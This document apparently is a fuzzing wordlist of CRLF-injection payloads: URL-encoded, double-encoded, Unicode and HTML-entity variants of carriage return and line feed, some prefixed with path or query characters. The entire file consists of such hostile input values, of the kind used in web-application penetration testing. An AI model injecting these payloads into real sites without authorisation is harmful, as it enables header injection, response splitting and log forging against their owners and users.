$0D
%%0A0A
%00%00%FE%FF%00%00%00%0A
%00%00%FE%FF%00%00%00%0D
%00%00%FE%FF%00%00%00%0D%00%00%FE%FF%00%00%00%0A
%0A
%0A%20
%0D
%0D%0A
%0D%0A%09
%0D%0A%20
%0D%20
%20%0A
%20%0D
%20%0D%0A
%23%0A
%23%0D
%23%0D%0A
%23%0a
%23%0d
%23%0d%23%0a
%23%OA
%25%30%61
%25%30A
%250A
%250D
%250D%250A
%25250A
%25250D
%25250D%25250A
%2F..%0a
%2F..%0d
%2F..%0d%0a
%3F%0A
%3F%0D
%3F%0D%0A
%3f%0a
%3f%0d
%3f%0d%3f%0a
%5cr%5cn
%E5%98%8A%E5%98%8D
%E5%98%8A%E5%98%8D%0A
%E5%98%8A%E5%98%8D%0D
%E5%98%8A%E5%98%8D%0D%0A
%EF%BD%0A
%EF%BD%0D
%EF%BD%0D%EF%BD%0A
%FE%FF%00%0A
%FE%FF%00%0D
%FE%FF%00%0D%FE%FF%00%0A
%u000A
&#10;
&#13;
&#13;&#10;
&NewLine;
&carriage;
&carriage;&NewLine;
/%%0a0a
/%%0d0d
/%%0d0d/%%0a0a
/%23%0a
/%23%0d
/%23%0d/%23%0a
/%25%30%61
/%25%30%64
/%25%30%64/%25%30%61
/%25%30a
/%25%30d
/%25%30d/%25%30a
/%250a
/%250d
/%250d/%250a
/%25250a
/%25250d
/%25250d/%25250a
/%3f%0a
/%3f%0d
/%3f%0d/%3f%0a
/%u000a
/%u000d
/%u000d/%u000a
/n
/r
/r/n
\12
\15
\15\12
\\n
\\r
\\r\\n
\n
\r
\r\n
\r\n 
\u000A
\u000D
\u000D\u000A
\u560d
\u560a
\u560d\u560a
